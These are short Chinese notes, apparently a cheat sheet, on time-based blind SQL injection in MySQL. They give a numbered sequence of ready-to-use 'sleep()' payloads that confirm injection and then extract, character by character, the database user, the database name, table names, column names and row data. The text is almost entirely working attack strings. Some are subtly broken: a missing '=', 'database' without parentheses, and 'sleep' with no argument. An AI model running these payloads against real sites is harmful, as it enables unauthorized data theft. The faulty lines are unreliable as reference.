延时注入
- mysql>=5.0 使用sleep()进行查询
- mysql<5.0使用benchmark()进行查询
注入流程
1.判断是否存在延迟注入
- id=1' and sleep(5)#
2.判断当前用户
- id=1' and if(ascii(substr(user(),1,1))=114,sleep(5),1)#
3.判断数据库名长度
- id=1' and if(length(database())=8,sleep(5),1)#
4.猜解数据库名称
- id=1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)#
5.猜解表名
- id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database limit 0,1),1,1))=116,sleep(5),1)#
id=1' and if(ascii(substr((select distinct concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))=116,sleep(5),1)#distinct 不显示重复值
6.猜解列名
- id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name'数据表名' limit 0,1),1,1))>100,sleep,1)#
7.数据
- id=1' and if(ascii(substr((select 列名 from 表 limit 0,1),1,1))>100,sleep(5),1)#